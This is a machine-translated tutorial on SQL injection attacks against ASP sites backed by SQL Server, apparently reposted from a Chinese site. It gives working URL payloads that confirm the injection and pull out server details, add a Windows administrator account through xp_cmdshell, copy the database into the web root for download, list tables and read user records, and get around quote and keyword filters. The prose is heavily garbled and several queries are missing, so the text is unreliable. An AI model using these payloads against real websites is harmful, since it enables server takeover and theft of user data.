Professional Documents
Culture Documents
SQL Server Injection Attack
SQL Server Injection Attack
With the B / S model of the development of application development, the use of this mode of programmers to write
applications more and more. However, due to the entry threshold of the industry is not high, the level and
experience of programmers also uneven, a large portion of programmers writing code at the time, there is no user
input data to determine the legality of, so that the existence of security applications. Users can submit code for
some database query, according to the procedures to return the results, he would like to know some of the data, and
SQL injection attacks are attacks on a regular basis, it can allow some unscrupulous users to search your data,
change the server settings, or when you do not care and out of your server. SQL injection attacks is not a SQL
Server problem, but inappropriate procedures. If you want to run these programs, you must understand that despite
a certain degree of risk.
Understanding of SQL injection should first understand some basic prior to the B / S mode of application of
knowledge, as well as cross-browser and server knowledge. In accordance with national conditions, the website of
domestic ASP + Access or SQL Server account for more than 70%, PHP + MySQL 20%, less than 10% of the
other. ASP + SQL Server for the application structure, an ASP process is a SQL Server client, it requires a
legitimate SQL login name and password to connect to SQL Server database. The following is a typical piece of
code in ASP to connect SQL SERVER examples:
strconn = "driver = (sql server); server =" & rServer & "; uid =" & rUid & "; pwd =" & rPWD & "; database =" &
rDatabase
conn.open strconn%>
SQL injection vulnerability point occurred in the process developer to construct a WHERE clause along with the
time of the user's input. For example, the following is a list of a simple ASP program article_show.asp, its function
is obtained with the GET parameters, according to ID database info_article table shows the corresponding ID value
of the contents of the article.
<tr class="trtitle">
<td> <div align="center"> <% = rs ( "title ")%>< br> </ div> </ td>
</ tr>
<tr class="trcontent">
</ tr>
</ table>
Please note strSQL = "select * from info_article where ID =" & strID this sentence. Actual run-time, the client
should use a URL similar to this http://www.abc.com/article_show.asp?ID=12 access the ASP program, when the
ID is the number 12, strID character of the value of "12" , VBScript in the "&" operator can connect any type of
data connection through & can get the value of strSQL string: select * from info_article where ID = 12, we can see
that this is a normal SQL statement. VBScript is a weakly typed languages, variables do not have the type of
statement (even without the variable declaration), which sometimes will bring convenience to programmers, but
also easy to process in the programming can be used a lot of loopholes. Since this procedure is not limited to the
type of variable strID a result, this procedure SQL injection vulnerability.
Second, testing
http://www.abc.com/article_show.asp?ID=12 '
This is a SQL Server query illegal. Then the server will return the following error:
Microsoft OLE DB Provider for ODBC Drivers error'80040e14 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] string''is not closed before the quotation marks.
This error has been full of this Web site can be injected into the attack.
In some cases the server shows that "when dealing with the server URL error" because the closure of the IIS
settings to the client to send a detailed error message, not necessarily at this time can not be injected, but the
relatively great difficulties, the only luck.
In some cases the content server to display the contents of ID = 12, there is no error message, it may be filtered
developers of single quotation marks, you can use the following methods to try:
article_show.asp? ID = 12 and 1 = 2
At this point if there is the following error, it is possible to carry out injections.
Error'80020009 '
Accidents.
Note: the following error message appears when injected certainly can not be completed:
Application uses a value of the wrong type for the current operation.
Identified can be implemented into the attack, you can use the following methods on the server for testing.
Return to:
[Microsoft] [ODBC SQL Server Driver] [SQL Server] the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760
(Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows
NT 5.0 (Build 2195: Service Pack 4) 'is converted to data type int columns for the syntax error occurred.
Return to:
[Microsoft] [ODBC SQL Server Driver] [SQL Server] the nvarchar value 'webuser' is converted to data type int
columns for the syntax error occurred.
Return to:
Microsoft OLE DB Provider for ODBC Drivers error'80040e07 '
[Microsoft] [ODBC SQL Server Driver] [SQL Server] the nvarchar value 'sitelog' is converted to data type int
columns for the syntax error occurred.
This SQL statement can be used to test whether the user currently logged on to the sysadmin server role, if the
return value is 1, then the return value is not 0. Here to change its character in order to see the specific numerical
data. So write the following URL: (one char (115) for the characters' s',% 2B for the plus sign (+) of the UTF-8
encoding.)
Return to:
[Microsoft] [ODBC SQL Server Driver] [SQL Server] the varchar value 's0' is converted to data type int columns
for the syntax error occurred.
If'0 'is not' sysadmin 'group members, if it is'1' is the 'sysadmin' group.
Return to:
[Microsoft] [ODBC SQL Server Driver] [SQL Server] the varchar value 's1' is converted to data type int columns
for the syntax error occurred.
This has access to a lot of valuable information. If the test for the current user a member of the sysadmin group,
then there is the possibility of a large can on this SQL Server to run cmd shell. If it is db_owner of the current can
be connected to any database operation, such as new tables, delete tables, insert data, read data and so on.
Fourth, sysadmin users can carry out the operation
Note: The following details on the server is no longer an error message, only the SQL statement can be used.
Add a NT users:
article_show.asp? ID = 12; EXEC master .. xp_cmdshell "net user name password / add" --
article_show.asp? ID = 12; EXEC master .. xp_cmdshell "net localgroup name administrators / add" --
Will do a complete database backup directory on the web site for download:
article_show.asp? ID = 12; BACKUP DATABASE database name to DISK = 'c: \ Inetpub \ wwwroot \ 1.db'; --
Sign of the sysadmin fixed server role from the deletion of:
Above the general operation of the server will appear below the normal display of information or the ID = 12 web
page:
Error'80020009 '
Accidents.
Ordinary users can not use the command listed in the fourth quarter, but still读出数据all the data library.
Use the following statements are listed in the database the first table name:
article_show.asp? ID = (SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS> 0
AND NAME NOT IN (''))
Be the first info_files called after a table, with the following statement to be the second table:
article_show.asp? ID = (SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS> 0
AND NAME NOT IN ( 'info_files'))
The second table to be named after info_articles, with the following statement to be the third table:
article_show.asp? ID = (SELECT TOP 1 NAME FROM SYSOBJECTS WHERE XTYPE = 'U' AND STATUS> 0
AND NAME NOT IN ( 'info_files',' info_articles'))
Use the following table info_users statement to be the first name field:
Use the following table info_users statement to be the second field name:
The assumption that the structure be info_users for ID, username, password, then use the following statement be
recorded in the first username value:
article_show.asp? ID = (SELECT TOP 1 CHAR (115)% 2B CAST (ID AS VARCHAR (2)) FROM info_users)
There are many developers using filter 'its way to "prevent" injection vulnerabilities, but can still make use of
relevant functions, to bypass the restrictions on the purpose of the procedure. For example take a look at how the
transformation of these words:
Simple, such as where xtype = 'U', the corresponding ASCII character code U is 85, so can be used where xtype =
char (85) in place of; if the characters are in Chinese, such as where name = 'user', can be used where name = nchar
(29992) + nchar (25143) to replace.
Some people will filter Select, Update, Delete these keywords, but just forget the case-sensitive, so we can try to
use this selecT.
Do not expect people in the field, we might as well look at the site of the login form, the general sake of
convenience, the form field names with the same input name check box.
Special Note: the address bar into the + process interpreted as a space,% 2B + No. interpreted as,% as% No. 25,
specifically refer to the relevant URLEncode introduced.
Get into the methods used when, IIS will put you to submit all of the strings, the Post method does not record, so
can not Post's website as far as possible Get.
SQL Server injection attack described above is not limited to these methods can be used a lot of their own SQL
statement to be clever information you want. The installation of SQL Server can be found after the "SQL Server
line from the book" SQL Server can be found here, all the statements, functions, system stored procedures and
Fuente: http://translate.google.com.ec/translate?hl=en&sl=zh-CN&u=http://www.rj-
itop.com/gonggao.php%3Fid%3D4633&ei=2HdBStmhNYmQkAXH-
Kz7CA&sa=X&oi=translate&resnum=3&ct=result&prev=/search%3Fq%3Dselect%2B
top%2B1%2Bchar(*)%26hl%3Den%26sa%3DN%26start%3D30